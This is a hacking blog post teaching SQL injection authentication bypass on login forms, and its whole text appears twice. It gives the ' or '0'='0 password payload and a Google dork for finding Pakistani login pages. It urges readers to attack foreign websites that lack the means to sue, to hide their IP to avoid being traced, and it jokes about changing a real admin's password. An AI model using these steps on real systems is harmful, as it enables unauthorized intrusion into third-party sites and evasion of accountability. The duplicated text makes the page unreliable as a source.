Being the first in a series of articles on the ways to achieve SQL injection, I must first explain what SQL injection entails.
Basically, each website you use is connected to a database at the back end. Whatever information you see on a website is information from a database. The most widely used language to communicate with databases is SQL(Structured Query Language). The syntax of queries may vary from one DB software to another but they all basically use SQL. In webpages, all the information you supply or anything you click on is converted to a query and passed to the database that you cant see.
In the URL of the website you use, you will often find some gibberish which you won't ever be able to make sense of. I've tried and I can tell you I still think it's gibberish. However, this is where the query actually is passed.
In a weak website, any fields that ask you for values may be exploitable , i.e., you may be able to make the values you pass a part of the original query sent to the database to manipulate it in any way you please. Similarly in the forms of SQL injection that will come up soon, the URL is exploitable.
SQL injection is basically injecting stuff you want to pass as a query into the original query being sent to the data base by the webpage.
Now authentication means verifying that you have the right to access whatever you are going to/already are accessing. When you log in to your Facebook account, you give a username and password. If correct, you're redirected to your account. This is authentication.
Bypass means to go past or go around, avoid.
We are going to learn how to bypass authentication to jump straight to the page we would have reached had we ignorantly logged in.
Now now, I know I you all excited with this no-password-straight-to-the-account talk, but you cant hack facebook, gmail ,yahoo or any big website's accounts like this. It's quite an outdated way to do things and most websites have put in measures to prevent this.
Here the rules of Website Hacking need a special mention.
Rule 1:
DON'T HACK BIG WEBSITES LIKE GOOGLE, FACEBOOK etc.
One, you won't be able to. They've thought of every vulnerability you have thought of, or will ever think of.
Two, if you do manage to find something, they'll sue you for every penny you're worth and more.
Three, you'll probably spend the next few years in jail.
So be careful.
Rule 2:
I'm an Indian and here the IT act prohibits you from hacking Indian Websites. Found any other country's website? Hack on! Just make sure they don't have the resources to come to India and sue you, because then, your ass is busted.
Rule 3:
Hide your IP. Use a VPN or a proxy server(Refer to this if you dont already know what that means.Or look specifically at VPNs).
Surprisingly, there still are quite a few websites that have this vulnerability. I found at least a dozen Pakistani websites that have this vulnerability.
How it works:
You find a login form.
In the username field you type "User" (without the quotes) and in the password field you type "Pass"(again without the quotes).
Suppose the table being used for the particular webpage is called "Tbl".
Internally when you press login, the webpage authenticates your rights and identity by passing the following query(or something like this :P):
select *webpagestuff* from Tbl where username='User' and password='Pass';
Given the fact that the username and password actually is User and Pass respectively, the query will be successful and the webpage will display certain information.
If you notice, whatever you typed in the fields for username and password were passed as it is.
Is there a way we could alter the query to always return the information?
A way to make the where clause always true?
Of course!
If you were to type jasdhfkjhdfk in the username field and ' or '0'='0 in the username and password fields, the query would become:
select *webpagestuff* from Tbl where username='jasdhfkjhdfk' and password='' or '0'='0';
You see, the red part is what you wrote. What does it do?
The first quote right before or closed the already existing quote. After this whatever we write becomes part of the query. Whenever an or is encountered in any programming language, the whole statement is evaluated as true if either the statement after or returns a true or the one before it.
The condition we chose to write is: '0'='0'.
The red part is what we wrote the last quote already was there!
So we made a condition that will always be true!
The most significant part is the or. It makes the truth value of the preceding statement absolutely useless as '0'='0' will always be true!
Hence for any value of username, the password field we gave will always be true!
We successfully login!
Now finally to how authentication bypass is achieved.
Step 1:
Find a site with a login form.You're going to take years if you don't use google dorks :P
Type this in the search bar:
inurl:login.asp site:pk
Keep the inurl and site tags where they are and you can keep trying other combinations.
Step 2:
In the username field type any random value. Even jahsdkahdkjah will do the trick :P
The website I'm showing has an option of logging in as admin.
Why not 3:-)
Step 3:
In the password field, type this exactly as it is:
' or '0'='0
Step 4:
The last step is always viola!
Oh look! An option to change the password so the real admin can't login.
Will I do it?
No!
I'm a good guy.
Or am I :P
Psst!
The ' or '0'='0 may not always work. Click here to have a look at other combinations you can use
Basically, each website you use is connected to a database at the back end. Whatever information you see on a website is information from a database. The most widely used language to communicate with databases is SQL(Structured Query Language). The syntax of queries may vary from one DB software to another but they all basically use SQL. In webpages, all the information you supply or anything you click on is converted to a query and passed to the database that you cant see.
In the URL of the website you use, you will often find some gibberish which you won't ever be able to make sense of. I've tried and I can tell you I still think it's gibberish. However, this is where the query actually is passed.
In a weak website, any fields that ask you for values may be exploitable , i.e., you may be able to make the values you pass a part of the original query sent to the database to manipulate it in any way you please. Similarly in the forms of SQL injection that will come up soon, the URL is exploitable.
SQL injection is basically injecting stuff you want to pass as a query into the original query being sent to the data base by the webpage.
Now authentication means verifying that you have the right to access whatever you are going to/already are accessing. When you log in to your Facebook account, you give a username and password. If correct, you're redirected to your account. This is authentication.
Bypass means to go past or go around, avoid.
We are going to learn how to bypass authentication to jump straight to the page we would have reached had we ignorantly logged in.
Now now, I know I you all excited with this no-password-straight-to-the-account talk, but you cant hack facebook, gmail ,yahoo or any big website's accounts like this. It's quite an outdated way to do things and most websites have put in measures to prevent this.
Here the rules of Website Hacking need a special mention.
Rule 1:
DON'T HACK BIG WEBSITES LIKE GOOGLE, FACEBOOK etc.
One, you won't be able to. They've thought of every vulnerability you have thought of, or will ever think of.
Two, if you do manage to find something, they'll sue you for every penny you're worth and more.
Three, you'll probably spend the next few years in jail.
So be careful.
Rule 2:
I'm an Indian and here the IT act prohibits you from hacking Indian Websites. Found any other country's website? Hack on! Just make sure they don't have the resources to come to India and sue you, because then, your ass is busted.
Rule 3:
Hide your IP. Use a VPN or a proxy server(Refer to this if you dont already know what that means.Or look specifically at VPNs).
Surprisingly, there still are quite a few websites that have this vulnerability. I found at least a dozen Pakistani websites that have this vulnerability.
How it works:
You find a login form.
In the username field you type "User" (without the quotes) and in the password field you type "Pass"(again without the quotes).
Suppose the table being used for the particular webpage is called "Tbl".
Internally when you press login, the webpage authenticates your rights and identity by passing the following query(or something like this :P):
select *webpagestuff* from Tbl where username='User' and password='Pass';
Given the fact that the username and password actually is User and Pass respectively, the query will be successful and the webpage will display certain information.
If you notice, whatever you typed in the fields for username and password were passed as it is.
Is there a way we could alter the query to always return the information?
A way to make the where clause always true?
Of course!
If you were to type jasdhfkjhdfk in the username field and ' or '0'='0 in the username and password fields, the query would become:
select *webpagestuff* from Tbl where username='jasdhfkjhdfk' and password='' or '0'='0';
You see, the red part is what you wrote. What does it do?
The first quote right before or closed the already existing quote. After this whatever we write becomes part of the query. Whenever an or is encountered in any programming language, the whole statement is evaluated as true if either the statement after or returns a true or the one before it.
The condition we chose to write is: '0'='0'.
The red part is what we wrote the last quote already was there!
So we made a condition that will always be true!
The most significant part is the or. It makes the truth value of the preceding statement absolutely useless as '0'='0' will always be true!
Hence for any value of username, the password field we gave will always be true!
We successfully login!
Now finally to how authentication bypass is achieved.
Step 1:
Find a site with a login form.You're going to take years if you don't use google dorks :P
Type this in the search bar:
inurl:login.asp site:pk
Keep the inurl and site tags where they are and you can keep trying other combinations.
Step 2:
In the username field type any random value. Even jahsdkahdkjah will do the trick :P
The website I'm showing has an option of logging in as admin.
Step 3:
In the password field, type this exactly as it is:
' or '0'='0
Step 4:
The last step is always viola!
Oh look! An option to change the password so the real admin can't login.
Will I do it?
No!
I'm a good guy.
Or am I :P
Psst!
The ' or '0'='0 may not always work. Click here to have a look at other combinations you can use
No comments:
Post a Comment